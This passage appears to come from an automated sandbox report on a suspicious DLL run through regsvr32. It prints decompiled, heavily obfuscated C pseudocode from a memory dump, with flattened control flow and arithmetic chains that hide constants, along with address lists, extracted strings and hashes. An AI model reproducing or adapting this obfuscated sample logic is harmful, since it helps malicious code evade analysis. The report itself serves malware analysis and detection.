															_t709 = E10004BB4(0x10001648, _v304);
															_push(_v132);
															_push(_v56);
															_push(_v240);
															E1000D68B(E10004BB4(0x100015e8, _v116), _v68, _v288, _t709, _v264,  &_v40, _v296);
															_t717 =  ==  ? 0x7f7095a : 0xb5c0023;
															E1000B9D7(_v48, _v156, _t709, _v220);
															E1000B9D7(_v212, _v280, _t710, _v248);
															_t832 =  &(_t832[0xf]);
															_t825 = 0x7d3743d;
															L24:
															_t827 = _v36;
															_t810 = 0x631991c;
															_t742 = 0x85af73e;
														}
														goto L25;
													}
												}
											}
										}
									}
									L28:
									return _t830;
								}
								if(_t717 == 0x7f7095a) {
									_push(_v292);
									_push(_v232);
									_push(_v284);
									E100065D5(_v160,  &_v24, 0x10001678, _v168, _v260, _v176, _v40, _v184, _v192,  &_v28, E10004BB4(0x10001678, _v276), _v268);
									_t717 =  ==  ? 0x14f8bb8 : _t825;
									E1000B9D7(_v236, _v244, _t687, _v80);
									_t832 =  &(_t832[0xf]);
									goto L24;
								} else {
									if(_t717 == _t742) {
										E1001AC2C(_v208, _v216, _v96,  &_v44, _v28, _v224, _v104, _t742, _v112, _v120, _v32, _v40);
										_t832 =  &(_t832[0xa]);
										_t810 = 0x631991c;
										_t697 = 0x594068d;
										_t742 = 0x85af73e;
										_t717 =  ==  ? 0x631991c : 0xed9cc0e;
										goto L4;
									} else {
										if(_t717 == 0xd849526) {
											E1000FB23(_v44, _v300, _v128, _v76, _v64);
											_t832 =  &(_t832[3]);
											_t717 = 0xed9cc0e;
											goto L1;
										} else {
											if(_t717 != 0xed9cc0e) {
												goto L25;
											} else {
												E10006A8D(_v84, _v228, _v32);
												_t717 = _t825;
												while(1) {
													L1:
													goto L2;
												}
											}
										}
									}
								}
								goto L28;
								L25:
							} while (_t717 != 0xb5c0023);
							goto L28;
						}
					}
				}
			}

0x1000e383
0x1000e38a
0x1000e38c
0x1000e393
0x1000e39a
0x1000e3a1
0x1000e3a8
0x1000e3aa
0x1000e3b1
0x1000e3b2
0x1000e3b3
0x1000e3b8
0x1000e3c3
0x1000e3c6
0x1000e3d1
0x1000e3d3
0x1000e3e0
0x1000e3e7
0x1000e3ec
0x1000e3f4
0x1000e3ff
0x1000e404
0x1000e40a
0x1000e40f
0x1000e417
0x1000e422
0x1000e42a
0x1000e435
0x1000e440
0x1000e44b
0x1000e456
0x1000e461
0x1000e469
0x1000e471
0x1000e479
0x1000e47e
0x1000e486
0x1000e48e
0x1000e496
0x1000e49b
0x1000e4a3
0x1000e4ae
0x1000e4b9
0x1000e4c4
0x1000e4cf
0x1000e4da
0x1000e4e5
0x1000e4f0
0x1000e502
0x1000e507
0x1000e510
0x1000e51b
0x1000e52e
0x1000e52f
0x1000e53e
0x1000e545
0x1000e550
0x1000e563
0x1000e56a
0x1000e575
0x1000e583
0x1000e587
0x1000e58f
0x1000e599
0x1000e5a1
0x1000e5ac
0x1000e5b7
0x1000e5c2
0x1000e5cd
0x1000e5d5
0x1000e5e0
0x1000e5e5
0x1000e5f0
0x1000e5f3
0x1000e5f7
0x1000e5ff
0x1000e60a
0x1000e615
0x1000e61d
0x1000e628
0x1000e633
0x1000e63e
0x1000e649
0x1000e65f
0x1000e666
0x1000e671
0x1000e67c
0x1000e687
0x1000e692
0x1000e69d
0x1000e6a5
0x1000e6ad
0x1000e6b5
0x1000e6ba
0x1000e6c2
0x1000e6cd
0x1000e6d8
0x1000e6e3
0x1000e6ee
0x1000e6f6
0x1000e701
0x1000e70c
0x1000e717
0x1000e722
0x1000e72a
0x1000e737
0x1000e73a
0x1000e73b
0x1000e744
0x1000e748
0x1000e750
0x1000e760
0x1000e764
0x1000e76c
0x1000e770
0x1000e778
0x1000e783
0x1000e78e
0x1000e799
0x1000e7a4
0x1000e7af
0x1000e7ba
0x1000e7c5
0x1000e7cd
0x1000e7db
0x1000e7e1
0x1000e7e9
0x1000e7f1
0x1000e7f6
0x1000e7fb
0x1000e803
0x1000e80b
0x1000e810
0x1000e81e
0x1000e823
0x1000e829
0x1000e831
0x1000e839
0x1000e846
0x1000e849
0x1000e84d
0x1000e855
0x1000e85d
0x1000e865
0x1000e872
0x1000e87b
0x1000e87e
0x1000e882
0x1000e88a
0x1000e892
0x1000e8a2
0x1000e8ab
0x1000e8ae
0x1000e8b2
0x1000e8ba
0x1000e8ca
0x1000e8ce
0x1000e8d6
0x1000e8de
0x1000e8e6
0x1000e8eb
0x1000e8f3
0x1000e8fb
0x1000e903
0x1000e90e
0x1000e920
0x1000e925
0x1000e92e
0x1000e939
0x1000e944
0x1000e94c
0x1000e957
0x1000e962
0x1000e96e
0x1000e971
0x1000e975
0x1000e97a
0x1000e97f
0x1000e987
0x1000e994
0x1000e9a8
0x1000e9ad
0x1000e9b4
0x1000e9bf
0x1000e9ca
0x1000e9df
0x1000e9e2
0x1000e9e9
0x1000e9f4
0x1000ea04
0x1000ea08
0x1000ea12
0x1000ea13
0x1000ea17
0x1000ea1f
0x1000ea27
0x1000ea2f
0x1000ea37
0x1000ea3f
0x1000ea47
0x1000ea54
0x1000ea58
0x1000ea60
0x1000ea6b
0x1000ea73
0x1000ea7e
0x1000ea86
0x1000ea8e
0x1000ea9b
0x1000ea9f
0x1000eaa7
0x1000eab2
0x1000eabd
0x1000eac8
0x1000ead0
0x1000ead8
0x1000eae0
0x1000eae8
0x1000eaf0
0x1000eaf5
0x1000eafa
0x1000eb02
0x1000eb15
0x1000eb1c
0x1000eb27
0x1000eb32
0x1000eb3a
0x1000eb45
0x1000eb50
0x1000eb5b
0x1000eb66
0x1000eb73
0x1000eb7d
0x1000eb81
0x1000eb89
0x1000eb94
0x1000eb9c
0x1000eba7
0x1000ebb2
0x1000ebc3
0x1000ebc6
0x1000ebcb
0x1000ebcf
0x1000ebd7
0x1000ebdc
0x1000ebe4
0x1000ebef
0x1000ebfa
0x1000ec05
0x1000ec1b
0x1000ec22
0x1000ec2d
0x1000ec38
0x1000ec4b
0x1000ec4e
0x1000ec55
0x1000ec60
0x1000ec6b
0x1000ec76
0x1000ec7e
0x1000ec89
0x1000ec94
0x1000ec9b
0x1000eca6
0x1000ecb1
0x1000ecc1
0x1000ecc5
0x1000eccd
0x1000ecd5
0x1000ecdd
0x1000ece8
0x1000ecf3
0x1000ecfe
0x1000ed09
0x1000ed14
0x1000ed1f
0x1000ed2a
0x1000ed35
0x1000ed40
0x1000ed4b
0x1000ed56
0x1000ed61
0x1000ed6d
0x1000ed70
0x1000ed74
0x1000ed79
0x1000ed81
0x1000ed8c
0x1000ed97
0x1000eda2
0x1000edad
0x1000edc0
0x1000edc7
0x1000edd2
0x1000eddd
0x1000ede8
0x1000edf0
0x1000edfb
0x1000edfb
0x1000ee00
0x1000ee00
0x1000ee00
0x1000ee05
0x1000ee05
0x1000ee0a
0x1000ee0a
0x1000ee0a
0x1000ee0a
0x1000ee0c
0x00000000
0x00000000
0x1000ee12
0x1000f1c0
0x1000ee18
0x1000ee1e
0x1000efca
0x1000efda
0x1000efe3
0x1000efe8
0x1000efeb
0x00000000
0x1000ee24
0x1000ee2a
0x1000efb5
0x00000000
0x1000ee30
0x1000ee32
0x1000ef95
0x1000efa3
0x1000efa6
0x1000efad
0x1000edfb
0x1000edfb
0x00000000
0x1000edfb
0x1000ee38
0x1000ee3a
0x1000ef3d
0x1000ef44
0x1000ef55
0x1000ef5a
0x1000ee00
0x1000ee00
0x1000ee05
0x00000000
0x1000ee40
0x1000ee46
0x1000ee4c
0x1000ee55
0x1000ee5c
0x1000ee67
0x1000ee76
0x1000ee7d
0x1000ee84
0x1000eeb7
0x1000eedf
0x1000eeea
0x1000eefc
0x1000ef01
0x1000ef04
0x1000f179
0x1000f179
0x1000f180
0x1000f185
0x1000f18a
0x00000000
0x1000ee46
0x1000ee3a
0x1000ee32
0x1000ee2a
0x1000ee1e
0x1000f1ca
0x1000f1d4
0x1000f1d4
0x1000effb
0x1000f0e5
0x1000f0ee
0x1000f0f2
0x1000f147
0x1000f16d
0x1000f171
0x1000f176
0x00000000
0x1000f001
0x1000f003
0x1000f0b6
0x1000f0bd
0x1000f0ce
0x1000f0d3
0x1000f0d8
0x1000f0dd
0x00000000
0x1000f005
0x1000f00b
0x1000f058
0x1000f05d
0x1000f060
0x00000000
0x1000f00d
0x1000f013
0x00000000
0x1000f019
0x1000f02b
0x1000f031
0x1000edfb
0x1000edfb
0x00000000
0x1000edfb
0x1000edfb
0x1000f013
0x1000f00b
0x1000f003
0x00000000
0x1000f18f
0x1000f18f
0x00000000
0x1000f19b
0x1000ee05
0x1000ee00

Strings

/a, xrefs: 1000E7CD
nE*9, xrefs: 1000E692
3}, xrefs: 1000E7E9
0gj, xrefs: 1000E9CA
1h8+, xrefs: 1000E56A
}, xrefs: 1000E962
2YY, xrefs: 1000E750
gcF, xrefs: 1000E78E
E+, xrefs: 1000ED4B
UEJ, xrefs: 1000ED81
m"Bn, xrefs: 1000E8D6

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 0gj$/a$1h8+$2YY$3}$E+$UEJ$gcF$m"Bn$nE*9$}
API String ID: 0-2717150470
Opcode ID: 6be6d80549ccc06722da553c190dc39fadfaa4764fa16567f93cfd517e32c798
Instruction ID: 30b7a5cc922110f49698cd0736c2a2a3cf31e0863ec4f453b0202ebb17fcfb02
Opcode Fuzzy Hash: 6be6d80549ccc06722da553c190dc39fadfaa4764fa16567f93cfd517e32c798
Instruction Fuzzy Hash: 7162F0715093819FE378CF61C98AA9FBBE2FBC4344F50891DE29986260D7B18949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 1001692B Relevance: 14.2, Strings: 11, Instructions: 443
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E1001692B(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _t544;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t570;
				signed int _t571;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				signed int _t576;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				signed int _t581;
				signed int _t582;
				signed int _t583;
				void* _t645;
				void* _t646;
				signed int* _t650;

				_t650 =  &_v2808;
				_v2792 = 0x47bc31;
				_v2792 = _v2792 << 0xc;
				_v2792 = _v2792 + 0xc12e;
				_v2792 = _v2792 + 0xffffb5bc;
				_v2792 = _v2792 ^ 0x7bc386c3;
				_v2756 = 0x56fb5a;
				_t645 = __ecx;
				_t646 = 0x8db4d32;
				_t567 = 0x49;
				_v2756 = _v2756 / _t567;
				_v2756 = _v2756 | 0x8f26889b;
				_v2756 = _v2756 ^ 0x9a1d8b65;
				_v2756 = _v2756 ^ 0x153a32fe;
				_v2784 = 0xa7a766;
				_t568 = 0x1f;
				_v2784 = _v2784 * 9;
				_v2784 = _v2784 + 0x5a70;
				_v2784 = _v2784 + 0xffff92e8;
				_v2784 = _v2784 ^ 0x05e4cfee;
				_v2632 = 0x35acba;
				_v2632 = _v2632 / _t568;
				_v2632 = _v2632 ^ 0x0001bb3f;
				_v2708 = 0xbb629d;
				_v2708 = _v2708 << 0x10;
				_t569 = 0xa;
				_v2708 = _v2708 / _t569;
				_v2708 = _v2708 ^ 0x09d4be02;
				_v2620 = 0x737fb3;
				_t570 = 0x5d;
				_v2620 = _v2620 / _t570;
				_v2620 = _v2620 ^ 0x000b7db5;
				_v2804 = 0x3fb57a;
				_v2804 = _v2804 << 0xb;
				_t571 = 0x38;
				_v2804 = _v2804 / _t571;
				_v2804 = _v2804 >> 0xa;
				_v2804 = _v2804 ^ 0x0002feb3;
				_v2796 = 0xaba775;
				_v2796 = _v2796 + 0x1344;
				_v2796 = _v2796 + 0xb507;
				_t572 = 0x62;
				_v2796 = _v2796 / _t572;
				_v2796 = _v2796 ^ 0x0001b10e;
				_v2772 = 0xfe97dc;
				_v2772 = _v2772 | 0x9643e043;
				_v2772 = _v2772 ^ 0x7b90e664;
				_v2772 = _v2772 | 0xa8643bcd;
				_v2772 = _v2772 ^ 0xed6ee43f;
				_v2696 = 0x1287f2;
				_v2696 = _v2696 + 0xffff9490;
				_v2696 = _v2696 ^ 0x6c3db522;
				_v2696 = _v2696 ^ 0x6c2eace4;
				_v2788 = 0x60288f;
				_t573 = 0xd;
				_v2788 = _v2788 / _t573;
				_t574 = 0x32;
				_v2788 = _v2788 / _t574;
				_v2788 = _v2788 + 0xfcdd;
				_v2788 = _v2788 ^ 0x000f6a7e;
				_v2728 = 0x542288;
				_v2728 = _v2728 >> 0xa;
				_t575 = 7;
				_v2728 = _v2728 / _t575;
				_v2728 = _v2728 ^ 0x000bbeca;
				_v2668 = 0x6b525a;
				_v2668 = _v2668 << 4;
				_v2668 = _v2668 ^ 0x06b6fc0f;
				_v2628 = 0x5ce6f7;
				_v2628 = _v2628 >> 2;
				_v2628 = _v2628 ^ 0x001740ab;
				_v2720 = 0x47d781;
				_v2720 = _v2720 + 0xffff7d4d;
				_v2720 = _v2720 << 0xe;
				_v2720 = _v2720 ^ 0xd53c5aef;
				_v2704 = 0x76ce50;
				_v2704 = _v2704 >> 0xd;
				_v2704 = _v2704 + 0x941b;
				_v2704 = _v2704 ^ 0x0001fad2;
				_v2612 = 0xe81c1c;
				_v2612 = _v2612 | 0xe0d81309;
				_v2612 = _v2612 ^ 0xe0ff6065;
				_v2764 = 0x7373c1;
				_v2764 = _v2764 | 0x3f9437f0;
				_v2764 = _v2764 >> 8;
				_v2764 = _v2764 + 0xffff9e1c;
				_v2764 = _v2764 ^ 0x003c4baa;
				_v2808 = 0x4fa2f6;
				_v2808 = _v2808 ^ 0xc63baa39;
				_v2808 = _v2808 + 0x832;
				_t576 = 0x6a;
				_v2808 = _v2808 / _t576;
				_v2808 = _v2808 ^ 0x01db74a1;
				_v2748 = 0xbce36c;
				_t577 = 9;
				_v2748 = _v2748 / _t577;
				_t578 = 0x31;
				_v2748 = _v2748 * 0x69;
				_v2748 = _v2748 ^ 0x30f3c23d;
				_v2748 = _v2748 ^ 0x38609518;
				_v2688 = 0x584adb;
				_v2688 = _v2688 ^ 0x7382c63e;
				_v2688 = _v2688 + 0xffff8e08;
				_v2688 = _v2688 ^ 0x73dab028;
				_v2780 = 0x23777c;
				_v2780 = _v2780 << 4;
				_v2780 = _v2780 / _t578;
				_v2780 = _v2780 ^ 0xf558fcbf;
				_v2780 = _v2780 ^ 0xf557f70d;
				_v2660 = 0xd9734d;
				_t579 = 3;
				_v2660 = _v2660 / _t579;
				_v2660 = _v2660 ^ 0x004433ce;
				_v2736 = 0x6bbe07;
				_v2736 = _v2736 + 0xec91;
				_v2736 = _v2736 + 0xffff12ce;
				_v2736 = _v2736 ^ 0x0062a5fc;
				_v2680 = 0x243b42;
				_v2680 = _v2680 >> 9;
				_v2680 = _v2680 ^ 0x000105ab;
				_v2712 = 0xaac452;
				_v2712 = _v2712 | 0xe9d86f3f;
				_v2712 = _v2712 + 0xc37d;
				_v2712 = _v2712 ^ 0xe9fef94a;
				_v2800 = 0xbf5ea;
				_v2800 = _v2800 ^ 0x7ea4bfc5;
				_t580 = 0x1a;
				_v2800 = _v2800 / _t580;
				_v2800 = _v2800 >> 0xe;
				_v2800 = _v2800 ^ 0x0003cff0;
				_v2604 = 0x5a913d;
				_v2604 = _v2604 ^ 0xf316efa0;
				_v2604 = _v2604 ^ 0xf34de971;
				_v2652 = 0x46b785;
				_v2652 = _v2652 * 0x71;
				_v2652 = _v2652 ^ 0x1f310f73;
				_v2732 = 0xf13215;
				_v2732 = _v2732 | 0xd0c6d483;
				_v2732 = _v2732 * 0x41;
				_v2732 = _v2732 ^ 0x0effb1cd;
				_v2716 = 0xe46c7c;
				_v2716 = _v2716 + 0x6ca7;
				_v2716 = _v2716 ^ 0x8739c1ae;
				_v2716 = _v2716 ^ 0x87d1ec3f;
				_v2776 = 0x372a1a;
				_v2776 = _v2776 | 0x2577e8c4;
				_v2776 = _v2776 * 0x2a;
				_v2776 = _v2776 + 0xffffab22;
				_v2776 = _v2776 ^ 0x25a214cb;
				_v2608 = 0x1099c5;
				_v2608 = _v2608 + 0xffffbcee;
				_v2608 = _v2608 ^ 0x00119ddd;
				_v2724 = 0x40bc44;
				_v2724 = _v2724 + 0x3f7e;
				_v2724 = _v2724 * 0x6a;
				_v2724 = _v2724 ^ 0x1ae792dc;
				_v2644 = 0xa16516;
				_v2644 = _v2644 + 0x76f9;
				_v2644 = _v2644 ^ 0x00ad8b8b;
				_v2676 = 0x7658c5;
				_v2676 = _v2676 >> 0x10;
				_v2676 = _v2676 ^ 0x0007402c;
				_v2616 = 0x53a035;
				_v2616 = _v2616 + 0xa8c0;
				_v2616 = _v2616 ^ 0x00505821;
				_v2636 = 0x3bf4ce;
				_v2636 = _v2636 | 0xe0979078;
				_v2636 = _v2636 ^ 0xe0b1bf1d;
				_v2740 = 0xb24572;
				_v2740 = _v2740 * 0x21;
				_v2740 = _v2740 >> 0xf;
				_v2740 = _v2740 ^ 0x00021b2b;
				_v2692 = 0x4f451b;
				_v2692 = _v2692 << 4;
				_t581 = 0x53;
				_v2692 = _v2692 / _t581;
				_v2692 = _v2692 ^ 0x000c5a09;
				_v2760 = 0x788679;
				_t582 = 0x5a;
				_v2760 = _v2760 / _t582;
				_v2760 = _v2760 + 0xffff9f05;
				_v2760 = _v2760 + 0x832d;
				_v2760 = _v2760 ^ 0x00092a6c;
				_v2672 = 0x3c33bb;
				_t583 = 0x5e;
				_v2672 = _v2672 * 0x54;
				_v2672 = _v2672 ^ 0x13ca52ae;
				_v2768 = 0x241f23;
				_v2768 = _v2768 * 0x74;
				_v2768 = _v2768 + 0xe69c;
				_v2768 = _v2768 >> 7;
				_v2768 = _v2768 ^ 0x002bc10e;
				_v2700 = 0xae62f9;
				_v2700 = _v2700 * 0x63;
				_v2700 = _v2700 | 0xfe34c77a;
				_v2700 = _v2700 ^ 0xff7d0228;
				_v2656 = 0x377065;
				_v2656 = _v2656 + 0x421b;
				_v2656 = _v2656 ^ 0x00376067;
				_v2664 = 0x352093;
				_v2664 = _v2664 / _t583;
				_v2664 = _v2664 ^ 0x000446be;
				_v2752 = 0xb3c430;
				_t584 = 0x47;
				_v2752 = _v2752 * 0x29;
				_v2752 = _v2752 + 0xffff9677;
				_v2752 = _v2752 << 0xd;
				_v2752 = _v2752 ^ 0x4048a85d;
				_v2624 = 0xaafda8;
				_v2624 = _v2624 * 7;
				_v2624 = _v2624 ^ 0x04af9de4;
				_v2640 = 0x2942a8;
				_v2640 = _v2640 + 0x5849;
				_v2640 = _v2640 ^ 0x0020b482;
				_v2684 = 0xb960de;
				_v2684 = _v2684 + 0xffff100a;
				_v2684 = _v2684 << 1;
				_v2684 = _v2684 ^ 0x0174b35c;
				_v2648 = 0x9ac68e;
				_t544 = _v2648 / _t584;
				_v2648 = _t544;
				_v2648 = _v2648 ^ 0x00029478;
				_v2744 = 0xb2c20d;
				_v2744 = _v2744 ^ 0xc500ec67;
				_v2744 = _v2744 + 0xffff3576;
				_v2744 = _v2744 + 0x8286;
				_v2744 = _v2744 ^ 0xc5b5218b;
				do {
					while(_t646 != 0x8db4d32) {
						if(_t646 != 0xe26f7e5) {
							_t657 = _t646 - 0xffacc8e;
							if(_t646 == 0xffacc8e) {
								E100166C2(_v2716,  &_v1040, _v2776, _v2784, _t584, _t584, _v2792, _v2608, _v2724, _v2644);
								_push(_v2740);
								_push(_v2636);
								_push(_v2616);
								E1001734A(_v2692, _t657, _v2760, _v2672, _v2768,  &_v520, E10004BB4(0x100018b4, _v2676), _v2700, 0x100018b4,  &_v1040);
								E1000B9D7(_v2656, _v2664, _t558, _v2752);
								_push(_v2744);
								_push(_v2648);
								_push(_v2684);
								_push(0);
								_push( &_v520);
								_push(_v2640);
								_push(0);
								_push(_v2632);
								return E100163F0(_v2624, 0, 0);
							}
							goto L9;
						}
						E10009574(_v2708,  &_v2600, _v2620, _v2804);
						 *((short*)(E1000FFDE(_v2796, _v2772,  &_v2600, _v2696) + _v2756 * 2)) = 0;
						E1000B200(_v2788, _v2728, __eflags, _v2668,  &_v1560, _v2628);
						_push(_v2764);
						_push(_v2612);
						_push(_v2704);
						E1001734A(_v2808, __eflags, _v2748, _v2688, _v2780,  &_v2080, E10004BB4(E10001834, _v2720), _v2660, E10001834,  &_v2600);
						E1000B9D7(_v2736, _v2680, _t551, _v2712);
						_t584 = _v2800;
						_t544 = E10009B80(_v2800, _v2604, _v2652,  &_v2080, _v2732, _t645);
						_t650 =  &(_t650[0x19]);
						__eflags = _t544;
						if(_t544 != 0) {
							_t646 = 0xffacc8e;
							continue;
						}
						return _t544;
					}
					_t646 = 0xe26f7e5;
					L9:
					__eflags = _t646 - 0x1903836;
				} while (_t646 != 0x1903836);
				return _t544;
			}

0x1001692b
0x10016931
0x1001693b
0x10016940
0x10016948
0x10016950
0x10016958
0x1001696a
0x1001696c
0x10016971
0x10016976
0x1001697c
0x10016984
0x1001698c
0x10016994
0x100169a1
0x100169a4
0x100169a8
0x100169b0
0x100169b8
0x100169c0
0x100169d6
0x100169dd
0x100169e8
0x100169f0
0x100169f9
0x100169fe
0x10016a04
0x10016a0c
0x10016a1e
0x10016a23
0x10016a2c
0x10016a37
0x10016a3f
0x10016a48
0x10016a4d
0x10016a53
0x10016a58
0x10016a60
0x10016a68
0x10016a70
0x10016a7c
0x10016a7f
0x10016a83
0x10016a8b
0x10016a93
0x10016a9b
0x10016aa3
0x10016aab
0x10016ab3
0x10016abe
0x10016ac9
0x10016ad4
0x10016adf
0x10016aef
0x10016af4
0x10016afe
0x10016b03
0x10016b09
0x10016b11
0x10016b19
0x10016b21
0x10016b2a
0x10016b2f
0x10016b35
0x10016b3d
0x10016b48
0x10016b50
0x10016b5b
0x10016b66
0x10016b6e
0x10016b79
0x10016b81
0x10016b89
0x10016b8e
0x10016b96
0x10016b9e
0x10016ba3
0x10016bab
0x10016bb3
0x10016bbe
0x10016bc9
0x10016bd4
0x10016bdc
0x10016be4
0x10016be9
0x10016bf1
0x10016bf9
0x10016c01
0x10016c09
0x10016c15
0x10016c1a
0x10016c20
0x10016c28
0x10016c34
0x10016c39
0x10016c44
0x10016c45
0x10016c49
0x10016c51
0x10016c59
0x10016c64
0x10016c6f
0x10016c7a
0x10016c85
0x10016c8d
0x10016c98
0x10016c9c
0x10016ca4
0x10016cac
0x10016cc2
0x10016cc7
0x10016cd0
0x10016cdb
0x10016ce3
0x10016ceb
0x10016cf3
0x10016cfb
0x10016d06
0x10016d0e
0x10016d19
0x10016d21
0x10016d29
0x10016d31
0x10016d39
0x10016d41
0x10016d4d
0x10016d52
0x10016d56
0x10016d5b
0x10016d63
0x10016d6e
0x10016d79
0x10016d84
0x10016d97
0x10016d9e
0x10016da9
0x10016db1
0x10016dbe
0x10016dc2
0x10016dca
0x10016dd2
0x10016dda
0x10016de2
0x10016dea
0x10016df2
0x10016dff
0x10016e03
0x10016e0b
0x10016e13
0x10016e1e
0x10016e29
0x10016e34
0x10016e3c
0x10016e49
0x10016e4d
0x10016e55
0x10016e60
0x10016e6b
0x10016e76
0x10016e81
0x10016e89
0x10016e94
0x10016e9f
0x10016eaa
0x10016eb5
0x10016ec0
0x10016ecb
0x10016ed6
0x10016ee3
0x10016ee7
0x10016eec
0x10016ef4
0x10016eff
0x10016f10
0x10016f15
0x10016f1e
0x10016f2e
0x10016f3f
0x10016f44
0x10016f4a
0x10016f52
0x10016f5a
0x10016f62
0x10016f75
0x10016f78
0x10016f7f
0x10016f8a
0x10016f97
0x10016f9b
0x10016fa3
0x10016fa8
0x10016fb0
0x10016fc3
0x10016fca
0x10016fd5
0x10016fe0
0x10016feb
0x10016ff6
0x10017001
0x10017017
0x1001701e
0x10017029
0x10017036
0x10017037
0x1001703b
0x10017043
0x10017048
0x10017050
0x10017063
0x1001706a
0x10017075
0x10017080
0x1001708b
0x10017096
0x100170a1
0x100170ac
0x100170b3
0x100170be
0x100170d0
0x100170d2
0x100170d9
0x100170e4
0x100170ec
0x100170f4
0x100170fc
0x10017104
0x1001710c
0x1001710c
0x1001711a
0x10017120
0x10017122
0x10017156
0x1001715b
0x10017164
0x1001716b
0x100171b9
0x100171d1
0x100171d6
0x100171e3
0x100171ea
0x100171f1
0x100171f3
0x100171f4
0x100171fb
0x100171fd
0x00000000
0x10017210
0x00000000
0x10017122
0x10017235
0x10017263
0x10017281
0x10017286
0x1001728f
0x10017296
0x100172e1
0x100172f9
0x1001731c
0x10017320
0x10017325
0x10017328
0x1001732a
0x10017330
0x00000000
0x10017330
0x1001721d
0x1001721d
0x10017337
0x10017339
0x10017339
0x10017339
0x00000000

Strings

ZRk, xrefs: 10016B3D
g`7, xrefs: 10016FF6
g, xrefs: 100170EC
B;$, xrefs: 10016CFB
|l, xrefs: 10016DCA
?n, xrefs: 10016AAB
l*, xrefs: 10016F5A
IX, xrefs: 10017080
!XP, xrefs: 10016EAA
|w#, xrefs: 10016C85
~?, xrefs: 10016E3C

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !XP$?n$B;$$IX$ZRk$g`7$g$l*$|l$|w#$~?
API String ID: 0-3187159781
Opcode ID: 81150a741ebfbd91ee9ef9fce1114eff761f6e35bef2706607859daa32e33f95
Instruction ID: abada78691d7cf56c3817629cfa5287329b36e5adbed37aabf5a93b40f6ea334
Opcode Fuzzy Hash: 81150a741ebfbd91ee9ef9fce1114eff761f6e35bef2706607859daa32e33f95
Instruction Fuzzy Hash: A932E0715083818FE368CF61C48AB9BBBE2FBC4348F10891DE5D986260DBB59959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1001C535 Relevance: 12.9, Strings: 10, Instructions: 446
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E1001C535() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				char _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				unsigned int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				signed int _v1212;
				signed int _v1216;
				signed int _v1220;
				signed int _v1224;
				signed int _v1228;
				signed int _v1232;
				signed int _v1236;
				signed int _v1240;
				signed int _v1244;
				signed int _v1248;
				signed int _v1252;
				signed int _v1256;
				signed int _v1260;
				signed int _v1264;
				void* _t518;
				void* _t520;
				intOrPtr _t521;
				intOrPtr* _t531;
				signed int _t539;
				intOrPtr _t540;
				intOrPtr* _t541;
				void* _t555;
				void* _t601;
				signed int* _t606;

				_t606 =  &_v1264;
				_v1052 = 0x7845b9;
				_v1048 = 0;
				_v1044 = 0;
				_v1264 = 0xc87a7;
				_v1264 = _v1264 * 0x72;
				_t601 = 0xb954f73;
				_v1264 = _v1264 | 0x12c79f4c;
				_v1264 = _v1264 >> 0xe;
				_v1264 = _v1264 ^ 0x00005f76;
				_v1112 = 0x497237;
				_v1112 = _v1112 ^ 0xc04b5ffa;
				_v1112 = _v1112 + 0xffff02a1;
				_v1112 = _v1112 ^ 0x4001306f;
				_v1192 = 0xc7fa6f;
				_v1192 = _v1192 | 0x876e5a2a;
				_v1192 = _v1192 ^ 0xaa26093a;
				_v1192 = _v1192 ^ 0x2dc9f357;
				_v1252 = 0xdaa21c;
				_v1252 = _v1252 + 0xa5bc;
				_v1252 = _v1252 + 0xd182;
